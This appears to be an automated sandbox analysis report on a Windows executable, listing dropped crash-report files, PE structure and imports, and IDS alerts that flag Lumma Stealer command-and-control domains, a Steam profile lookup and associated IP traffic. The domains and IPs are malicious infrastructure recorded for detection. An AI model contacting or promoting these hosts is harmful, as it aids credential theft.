                                                                                                                                                                                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.5.0.1.1.1.3.3.7.5.4.8.7.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.5.0.1.1.1.7.6.5.6.7.4.0.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.d.9.d.9.5.b.9.-.5.e.0.e.-.4.c.8.3.-.9.4.7.0.-.f.f.7.6.6.9.5.2.d.2.7.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.5.4.5.b.6.2.8.-.6.e.d.8.-.4.6.4.b.-.8.c.4.b.-.0.2.4.b.d.2.e.f.a.1.7.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.b.a.d._.m.o.d.u.l.e._.i.n.f.o.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.1.c.-.0.0.0.1.-.0.0.1.4.-.b.f.2.f.-.c.2.8.8.d.a.5.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.1.2.9.1.e.d.5.e.1.2.6.a.0.7.8.9.f.8.5.3.9.b.a.c.1.f.1.0.b.6.7.0.0.0.0.f.f.f.f.!.0.0.0.0.5.7.9.2.4.7.1.b.e.8.a.2.5.d.8.4.7.2.a.8.4.f.a.3.9.6.7.f.2.4.1.f.7.7.6.b.5.c.b.a.!.3.z.g.6.i.6.Z.u.1.u...e.x.e.....T.a.r.g.e.t.A.p.

                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER4027.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):8314
                                                                                                                                                                                                                                                        Entropy (8bit):3.68210632616567
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:R6l7wVeJ716Kq6YSISU95wrgmfhWpDT89bwMsfqQm:R6lXJJ6p6YtSU95wrgmfhPwffc
                                                                                                                                                                                                                                                        MD5:C7DC830C2F02EC1A302B431A2CC588BB
                                                                                                                                                                                                                                                        SHA1:080370CDD057FE077D123CC7BCF9DC1154914A0E
                                                                                                                                                                                                                                                        SHA-256:99D0B5C7F856D57635A21892C1E6CC98D99DA0B32F323794344C0C7E0003782E
                                                                                                                                                                                                                                                        SHA-512:29459E024BFF8485972764C714EB3D570874289DFD6811B6E8B3B34802F3EA2317C3A5CB02DB4AC8869640C055F658DE97E7A4A8239C9D9F793D2BCB2B764342
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.5.6.4.<./.P.i.

                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER4067.tmp.xml

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):4578
                                                                                                                                                                                                                                                        Entropy (8bit):4.454300351532152
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:cvIwWl8zsXiJg77aI9NaWpW8VYFv5Ym8M4JTEFv+q8as3zC2d:uIjfXwI77b7VGAJOG3zC2d
                                                                                                                                                                                                                                                        MD5:936041260A0E4DC33E6A1556E506020C
                                                                                                                                                                                                                                                        SHA1:8E69140BE56A4ABBBE0321943F67966ABEF9FE78
                                                                                                                                                                                                                                                        SHA-256:39B840D819A13C3095949A44877894F0F3A193414A3B29A1C75FB12FD10DECBC
                                                                                                                                                                                                                                                        SHA-512:393DFA0B1D5ECAF32DBAEAC2041F85637C12C7522CED02967B412017721CA2F8A109B26118F2E3732910875A820EEF5401AF825BC812BFE99F7EE7907AE90AFE
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="645067" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\WER3057.tmp.WERDataCollectionStatus.txt

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):4886
                                                                                                                                                                                                                                                        Entropy (8bit):3.2574474468595307
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:pwpIinkXkkXckmtuWEt0QEk0QS0Qgi0QXP0QU0QaqtgwXSrCszeuzSzbxGQI5lmr:pylt7u/epmoeyOkN7Q
                                                                                                                                                                                                                                                        MD5:81E846E10722F0C3C52918EEFE0E4D9A
                                                                                                                                                                                                                                                        SHA1:CFE5BF26C75EF3884A7437FB1CFA96F5C2F43D03
                                                                                                                                                                                                                                                        SHA-256:8D98E84AF661C216F56D8B0FEE1F5020FA489EB5693F6FBDC32754786BD0C38F
                                                                                                                                                                                                                                                        SHA-512:8AF4EE3B3854C96939B377ADD2D663F91C079A90449E59A5E4BE01E9B6FFC2175D28F888C136C89F4B639D0B9A6161F7887870755155B1B8D101ADD6A83E1E6E
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:......S.n.a.p.s.h.o.t. .s.t.a.t.i.s.t.i.c.s.:.....-. .S.i.g.n.a.t.u.r.e. . . . . . . . . . . . . . . . .:. .P.S.S.D.......-. .F.l.a.g.s./.C.a.p.t.u.r.e.F.l.a.g.s. . . . . . . .:. .0.0.0.0.0.0.0.1./.d.0.0.0.3.9.f.f.......-. .A.u.x. .p.a.g.e.s. . . . . . . . . . . . . . . . .:. .1. .e.n.t.r.i.e.s. .l.o.n.g.......-. .V.A. .s.p.a.c.e. .s.t.r.e.a.m. . . . . . . . . . .:. .5.5.3.4.4. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .t.r.a.c.e. .s.t.r.e.a.m. . . . . . .:. .0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .s.t.r.e.a.m. . . . . . . . . . . . .:. .3.9.7.6.2. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .T.h.r.e.a.d.s. . . . . . . . . . . . . . . . . . .:. .9. .t.h.r.e.a.d.s.......-. .T.h.r.e.a.d. .s.t.r.e.a.m. . . . . . . . . . . . .:. .1.7.2.8. .b.y.t.e.s. .i.n. .s.i.z.e...........S.n.a.p.s.h.o.t. .p.e.r.f.o.r.m.a.n.c.e. .c.o.u.n.t.e.r.s.:.....-. .T.o.t.a.l.C.y.c.l.e.C.o.u.n.t. . . . . . . . . . .:. .3.1.2.9.8.5.4.3. .c.y.c.l.e.s.......-. .V.a.C.l.o.n.e.C.y.c.l.e.C.o.u.n.t. . . . .

                                                                                                                                                                                                                                                        C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1835008
                                                                                                                                                                                                                                                        Entropy (8bit):4.372094014390956
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6144:qFVfpi6ceLP/9skLmb0ayWWSPtaJG8nAge35OlMMhA2AX4WABlguNjiL:CV1QyWWI/glMM6kF7Fq
                                                                                                                                                                                                                                                        MD5:FE81BA60679030DCDC81A916D3D3ACB1
                                                                                                                                                                                                                                                        SHA1:C6971AC40C9292A5A29368000B548DAC37B6E3A8
                                                                                                                                                                                                                                                        SHA-256:D4A4F429CCCBC81324C4B82D65492A4D70D5E1C4F3D189E0622EE2FC6114CE19
                                                                                                                                                                                                                                                        SHA-512:8C91AAE095DEB4F740F17A9C3A0D1BEFCEF82CE2D7B6C799196ADA149BCE9E6A9CF900935DC1C2DA7968B05B08C02AB0A828B160E95C4EA34248215971B7B2A1
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:regfC...C....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.tM..U...............................................................................................................................................................................................................................................................................................................................................{Z.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                        Static File Info

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                        Entropy (8bit):6.593029920839553
                                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                        File name:3zg6i6Zu1u.exe
                                                                                                                                                                                                                                                        File size:340'992 bytes
                                                                                                                                                                                                                                                        MD5:996aa4b544e08689f305d751c60835c7
                                                                                                                                                                                                                                                        SHA1:5792471be8a25d8472a84fa3967f241f776b5cba
                                                                                                                                                                                                                                                        SHA256:5f20a76b1d382a5817af09d9c0307fbaeeae34a3e6b714e0eded2bca695bdd94
                                                                                                                                                                                                                                                        SHA512:b07872c69b2fea39be2e474511f8016ae8fb2d727f20de57b8ab9331cd478468a643f638966638a2e482dc8d27ca6c08391c1dfcf7e011ed0d40c06ccd802a3d
                                                                                                                                                                                                                                                        SSDEEP:6144:kJ86J8nE0fJHAzCyJkGxsTByhaA+Hpnh8UMAFxvg5o3C6R:kJ86JIxfJwCmkGu/hMAPYy
                                                                                                                                                                                                                                                        TLSH:E174DF12B9F1D132EBFB5A3408B493A66ABFB8233830818F3654276E5D316C18E75747
                                                                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........I...I...I.......K...W...T...W...]...W...%...n_..L...I...1...W...H...W...H...W...H...RichI...........................PE..L..

                                                                                                                                                                                                                                                        File Icon

                                                                                                                                                                                                                                                        Icon Hash:187c7319952b2776

                                                                                                                                                                                                                                                        Static PE Info

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        Entrypoint:0x4016fc
                                                                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                        Time Stamp:0x64EC1F9B [Mon Aug 28 04:16:27 2023 UTC]
                                                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                                                        OS Version Major:5
                                                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                                                        File Version Major:5
                                                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                                                        Subsystem Version Major:5
                                                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                                                        Import Hash:7e25ebcd79e0614919635825d01ef9bc

                                                                                                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                                                        call 00007FE078BBC178h
                                                                                                                                                                                                                                                        jmp 00007FE078BB93FDh
                                                                                                                                                                                                                                                        mov edi, edi
                                                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                                                                                                        sub esp, 00000328h
                                                                                                                                                                                                                                                        mov dword ptr [00445C48h], eax
                                                                                                                                                                                                                                                        mov dword ptr [00445C44h], ecx
                                                                                                                                                                                                                                                        mov dword ptr [00445C40h], edx
                                                                                                                                                                                                                                                        mov dword ptr [00445C3Ch], ebx
                                                                                                                                                                                                                                                        mov dword ptr [00445C38h], esi
                                                                                                                                                                                                                                                        mov dword ptr [00445C34h], edi
                                                                                                                                                                                                                                                        mov word ptr [00445C60h], ss
                                                                                                                                                                                                                                                        mov word ptr [00445C54h], cs
                                                                                                                                                                                                                                                        mov word ptr [00445C30h], ds
                                                                                                                                                                                                                                                        mov word ptr [00445C2Ch], es
                                                                                                                                                                                                                                                        mov word ptr [00445C28h], fs
                                                                                                                                                                                                                                                        mov word ptr [00445C24h], gs
                                                                                                                                                                                                                                                        pushfd
                                                                                                                                                                                                                                                        pop dword ptr [00445C58h]
                                                                                                                                                                                                                                                        mov eax, dword ptr [ebp+00h]
                                                                                                                                                                                                                                                        mov dword ptr [00445C4Ch], eax
                                                                                                                                                                                                                                                        mov eax, dword ptr [ebp+04h]
                                                                                                                                                                                                                                                        mov dword ptr [00445C50h], eax
                                                                                                                                                                                                                                                        lea eax, dword ptr [ebp+08h]
                                                                                                                                                                                                                                                        mov dword ptr [00445C5Ch], eax
                                                                                                                                                                                                                                                        mov eax, dword ptr [ebp-00000320h]
                                                                                                                                                                                                                                                        mov dword ptr [00445B98h], 00010001h
                                                                                                                                                                                                                                                        mov eax, dword ptr [00445C50h]
                                                                                                                                                                                                                                                        mov dword ptr [00445B4Ch], eax
                                                                                                                                                                                                                                                        mov dword ptr [00445B40h], C0000409h
                                                                                                                                                                                                                                                        mov dword ptr [00445B44h], 00000001h
                                                                                                                                                                                                                                                        mov eax, dword ptr [00443008h]
                                                                                                                                                                                                                                                        mov dword ptr [ebp-00000328h], eax
                                                                                                                                                                                                                                                        mov eax, dword ptr [0044300Ch]
                                                                                                                                                                                                                                                        mov dword ptr [ebp-00000324h], eax
                                                                                                                                                                                                                                                        call dword ptr [000000D8h]

                                                                                                                                                                                                                                                        Rich Headers

                                                                                                                                                                                                                                                        Programming Language:
                                                                                                                                                                                                                                                        • [C++] VS2008 build 21022
                                                                                                                                                                                                                                                        • [ASM] VS2008 build 21022
                                                                                                                                                                                                                                                        • [ C ] VS2008 build 21022
                                                                                                                                                                                                                                                        • [IMP] VS2005 build 50727
                                                                                                                                                                                                                                                        • [RES] VS2008 build 21022
                                                                                                                                                                                                                                                        • [LNK] VS2008 build 21022

                                                                                                                                                                                                                                                        Data Directories

                                                                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x418fc0x3c.rdata
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x4210000xaba8.rsrc
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x400000x1a4.rdata
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                        Sections

                                                                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                        .text0x10000x3ee9c0x3f00041a0a7395288681d6c538d4023b7f58dFalse0.8038659474206349data7.366149067404338IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                        .rdata0x400000x22720x240002823cc98bd8e55102503e87d75180f4False0.3528645833333333data5.40348420666472IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                        .data0x430000x3dd1180x700076cc7ca842dab3a08d822ff206bbc78eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                        .rsrc0x4210000xaba80xac00035759e3ed74f008e518eaed194c8ac5False0.401866824127907data3.9530745630526813IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                        Resources

                                                                                                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                        RT_ICON0x4214300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkmenTurkmenistan0.2835820895522388
                                                                                                                                                                                                                                                        RT_ICON0x4222d80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkmenTurkmenistan0.28564981949458484
                                                                                                                                                                                                                                                        RT_ICON0x422b800x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkmenTurkmenistan0.41359447004608296
                                                                                                                                                                                                                                                        RT_ICON0x4232480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkmenTurkmenistan0.29552023121387283
                                                                                                                                                                                                                                                        RT_ICON0x4237b00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkmenTurkmenistan0.3857883817427386
                                                                                                                                                                                                                                                        RT_ICON0x425d580x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkmenTurkmenistan0.4481707317073171
                                                                                                                                                                                                                                                        RT_ICON0x426e000x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkmenTurkmenistan0.5922131147540983
                                                                                                                                                                                                                                                        RT_ICON0x4277880x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkmenTurkmenistan0.6640070921985816
                                                                                                                                                                                                                                                        RT_STRING0x427e200x330data0.4730392156862745
                                                                                                                                                                                                                                                        RT_STRING0x4281500x170data0.5081521739130435
                                                                                                                                                                                                                                                        RT_STRING0x4282c00x620data0.4343112244897959
                                                                                                                                                                                                                                                        RT_STRING0x4288e00x762data0.4174603174603175
                                                                                                                                                                                                                                                        RT_STRING0x4290480x852data0.415962441314554
                                                                                                                                                                                                                                                        RT_STRING0x4298a00x726data0.42349726775956287
                                                                                                                                                                                                                                                        RT_STRING0x429fc80x658data0.43596059113300495
                                                                                                                                                                                                                                                        RT_STRING0x42a6200x6c0data0.4351851851851852
                                                                                                                                                                                                                                                        RT_STRING0x42ace00x638data0.4396984924623116
                                                                                                                                                                                                                                                        RT_STRING0x42b3180x88adata0.4080512351326624
                                                                                                                                                                                                                                                        RT_GROUP_ICON0x427bf00x76dataTurkmenTurkmenistan0.6610169491525424
                                                                                                                                                                                                                                                        RT_VERSION0x427c680x1b4data0.5756880733944955

                                                                                                                                                                                                                                                        Imports

                                                                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                                                                        KERNEL32.dllGetCommandLineW, GetComputerNameA, SetDefaultCommConfigA, WriteConsoleOutputW, SetWaitableTimer, SetUnhandledExceptionFilter, EndUpdateResourceW, InterlockedIncrement, InterlockedDecrement, ReadConsoleOutputAttribute, GetEnvironmentStringsW, GetTimeFormatA, GetModuleHandleW, GetDateFormatA, SetProcessPriorityBoost, LoadLibraryW, ReadProcessMemory, DeleteVolumeMountPointW, GetConsoleAliasW, GetAtomNameW, GetStartupInfoW, DisconnectNamedPipe, SetLastError, GetProcAddress, SearchPathA, SetFileAttributesA, GetNumaHighestNodeNumber, ResetEvent, LoadLibraryA, LocalAlloc, AddAtomA, FoldStringA, GetModuleHandleA, SetLocaleInfoW, OpenFileMappingW, BuildCommDCBA, GetShortPathNameW, Module32Next, GetVersionExA, FindAtomW, FindFirstVolumeW, UnregisterWaitEx, WriteConsoleW, GetConsoleOutputCP, GetLastError, HeapFree, HeapAlloc, Sleep, ExitProcess, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, IsDebuggerPresent, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, WriteFile, GetStdHandle, GetModuleFileNameA, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, InitializeCriticalSectionAndSpinCount, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, GetLocaleInfoA, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, ReadFile, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, SetStdHandle, CloseHandle, WriteConsoleA, CreateFileA
                                                                                                                                                                                                                                                        USER32.dllGetProcessDefaultLayout

                                                                                                                                                                                                                                                        Possible Origin

                                                                                                                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                        TurkmenTurkmenistan

                                                                                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                                                                                        Suricata IDS Alerts

                                                                                                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                        2024-12-24T09:05:05.853014+01002058285ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spellshagey .biz)1192.168.2.8531001.1.1.153UDP
                                                                                                                                                                                                                                                        2024-12-24T09:05:06.013971+01002058222ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz)1192.168.2.8497131.1.1.153UDP
                                                                                                                                                                                                                                                        2024-12-24T09:05:06.250945+01002058214ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz)1192.168.2.8647081.1.1.153UDP
                                                                                                                                                                                                                                                        2024-12-24T09:05:06.482372+01002058220ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz)1192.168.2.8568851.1.1.153UDP
                                                                                                                                                                                                                                                        2024-12-24T09:05:06.702284+01002058218ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz)1192.168.2.8581921.1.1.153UDP
                                                                                                                                                                                                                                                        2024-12-24T09:05:07.012101+01002058216ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz)1192.168.2.8577691.1.1.153UDP
                                                                                                                                                                                                                                                        2024-12-24T09:05:07.237760+01002058236ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou)1192.168.2.8630661.1.1.153UDP
                                                                                                                                                                                                                                                        2024-12-24T09:05:07.471701+01002058210ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou)1192.168.2.8579411.1.1.153UDP
                                                                                                                                                                                                                                                        2024-12-24T09:05:07.795281+01002058226ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)1192.168.2.8651461.1.1.153UDP
                                                                                                                                                                                                                                                        2024-12-24T09:05:09.648432+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.84970523.55.153.106443TCP
                                                                                                                                                                                                                                                        2024-12-24T09:05:10.476631+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.84970523.55.153.106443TCP
                                                                                                                                                                                                                                                        2024-12-24T09:05:12.050993+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849706172.67.157.254443TCP
                                                                                                                                                                                                                                                        2024-12-24T09:05:12.811595+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.849706172.67.157.254443TCP
                                                                                                                                                                                                                                                        2024-12-24T09:05:12.811595+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849706172.67.157.254443TCP
                                                                                                                                                                                                                                                        2024-12-24T09:05:13.830658+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849707172.67.157.254443TCP

                                                                                                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                                                                                                        TCP Packets

                                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:08.252239943 CET49705443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:08.252285957 CET4434970523.55.153.106192.168.2.8
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:08.252363920 CET49705443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:08.255775928 CET49705443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:08.255790949 CET4434970523.55.153.106192.168.2.8
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:09.648354053 CET4434970523.55.153.106192.168.2.8
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:09.648432016 CET49705443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:09.650865078 CET49705443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:09.650882006 CET4434970523.55.153.106192.168.2.8
